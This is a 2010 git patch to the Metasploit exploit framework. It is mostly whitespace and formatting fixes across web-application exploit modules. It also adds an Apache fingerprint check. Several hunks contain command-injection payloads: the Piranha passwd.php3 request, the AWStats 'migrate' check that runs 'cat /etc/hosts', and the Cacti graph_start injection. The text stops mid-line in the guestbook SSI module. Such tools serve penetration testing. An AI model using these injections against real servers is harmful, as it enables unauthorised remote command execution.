From a3d901a6b97c58aa623442bc23dfde004c6ea249 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Sat, 3 Jul 2010 06:21:31 +0000 Subject: [PATCH] various minor fixes, some added fingerprinting git-svn-id: file:///home/svn/framework3/trunk@9671 4d416f70-5f16-0410-b530-b9f4589650da --- .../linux/http/piranha_passwd_exec.rb | 6 +++ .../exploits/multi/http/tomcat_mgr_deploy.rb | 1 - .../unix/http/contentkeeperweb_mimencode.rb | 42 +++++++++---------- .../unix/webapp/awstats_migrate_exec.rb | 36 ++++++++-------- .../unix/webapp/cacti_graphimage_exec.rb | 30 ++++++------- .../unix/webapp/coppermine_piceditor.rb | 2 +- .../unix/webapp/guestbook_ssi_exec.rb | 2 +- .../webapp/openview_connectednodes_exec.rb | 12 +++--- modules/exploits/unix/webapp/php_include.rb | 1 - .../unix/webapp/php_vbulletin_template.rb | 42 +++++++++++-------- .../unix/webapp/php_wordpress_lastpost.rb | 6 +-- .../exploits/unix/webapp/php_xmlrpc_eval.rb | 11 +++-- .../exploits/unix/webapp/phpbb_highlight.rb | 4 +- .../webapp/tikiwiki_graph_formula_exec.rb | 20 ++++----- .../unix/webapp/tikiwiki_jhot_exec.rb | 34 +++++++-------- modules/exploits/unix/webapp/twiki_history.rb | 6 +-- modules/exploits/unix/webapp/twiki_search.rb | 6 +-- 17 files changed, 135 insertions(+), 126 deletions(-) diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index aa3dfea751..7afd2177ed 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -63,6 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Compat' => { 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl' } }, 'Targets' => @@ -80,6 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit + info = http_fingerprint + if not (info =~ /Apache/) + raise RuntimeError, 'The target server is not running Apache.' + end + cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal') str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT" print_status("Sending GET request with encoded command line...") diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 3b95088813..94dd95b5c0 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -83,7 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'linux' }, ], - ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 09 2009')) diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index 7f709eb7cc..61e4a8867a 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -18,26 +18,26 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'ContentKeeper Web Remote Command Execution', - 'Description' => %q{ - This module exploits the ContentKeeper Web Appliance. Versions prior + 'Name' => 'ContentKeeper Web Remote Command Execution', + 'Description' => %q{ + This module exploits the ContentKeeper Web Appliance. Versions prior to 125.10 are affected. This module exploits a combination of weaknesses to enable remote command execution as the Apache user. Following exploitation it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool' to escalate to root. }, - 'Author' => [ 'patrick' ], - 'Arch' => [ ARCH_CMD ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => - [ - [ 'OSVDB', '54551'], - [ 'OSVDB', '54552'], - [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ], - ], - 'Privileged' => false, - 'Payload' => + 'Author' => [ 'patrick' ], + 'Arch' => [ ARCH_CMD ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + [ 'OSVDB', '54551'], + [ 'OSVDB', '54552'], + [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ], + ], + 'Privileged' => false, + 'Payload' => { 'DisableNops' => true, 'Space' => 1024, @@ -47,15 +47,15 @@ class Metasploit3 < Msf::Exploit::Remote 'RequiredCmd' => 'generic perl ruby telnet', } }, - 'Platform' => ['unix'], - 'Targets' => - [ - [ 'Automatic', { } ] - ], + 'Platform' => ['unix'], + 'Targets' => + [ + [ 'Automatic', { } ] + ], 'DisclosureDate' => 'Feb 25 2009', 'DefaultTarget' => 0)) - register_options( + register_options( [ Opt::RPORT(80), ],self.class) diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index f4e4282917..1603549b0f 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -23,10 +23,10 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'AWStats migrate Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the - AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based - payloads are recommended with this module. The vulnerability is only - present when AllowToUpdateStatsFromBrowser is enabled in the AWstats - configuration file (non-default). + AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based + payloads are recommended with this module. The vulnerability is only + present when AllowToUpdateStatsFromBrowser is enabled in the AWstats + configuration file (non-default). }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, @@ -56,21 +56,21 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'May 04 2006', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]), - OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]), - ], self.class) + register_options( + [ + OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]), + OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]), + ], self.class) end def check res = send_request_cgi({ 'uri' => datastore['URI'], 'vars_get' => - { - 'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt" - } - }, 25) + { + 'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt" + } + }, 25) if (res and res.body.match(/localhost/)) return Exploit::CheckCode::Vulnerable @@ -87,11 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => sploit, 'method' => 'GET', 'headers' => - { - 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', - 'Connection' => 'Close', - } - }, 25) + { + 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', + 'Connection' => 'Close', + } + }, 25) if (res) print_status("The server returned: #{res.code} #{res.message}") diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index 4a192d39b0..ee5cd3a0de 100644 --- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -30,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - ['OSVDB', '17539'], - ['BID', '14042'], + [ 'OSVDB', '17539' ], + [ 'BID', '14042' ], ], 'Privileged' => false, 'Payload' => @@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 15 2005', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]), - ], self.class) + register_options( + [ + OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]), + ], self.class) end def exploit @@ -61,10 +61,10 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'uri' => datastore['URI'], 'vars_get' => - { - 'action' => 'list' - } - }, 10) + { + 'action' => 'list' + } + }, 10) if (not res) print_error("The server gave no response") @@ -81,11 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'uri' => datastore['URI'], 'vars_get' => - { - 'local_graph_id' => m[1], - 'graph_start' => "\necho YYY;#{payload.encoded};echo YYY;echo\n" - } - }, 25) + { + 'local_graph_id' => m[1], + 'graph_start' => "\necho YYY;#{payload.encoded};echo YYY;echo\n" + } + }, 25) if (res) print_status("The server returned: #{res.code} #{res.message}") diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 110bfe59c3..4a68394a50 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote 'quality' => '50', # not required, but fixes an error message 'newimage' => img } - }, 25) + }, 25) if (res and res.code == 200) print_status("Successfully POST'd exploit data") diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 1597900b0e..dcc3b84268 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote email = rand_text_alphanumeric(20) city = rand_text_alphanumeric(20) state = rand_text_alphanumeric(20) - country = rand_text_alphanumeric(20) + country = rand_text_alphanumeric(20) sploit = Rex::Text.uri_encode("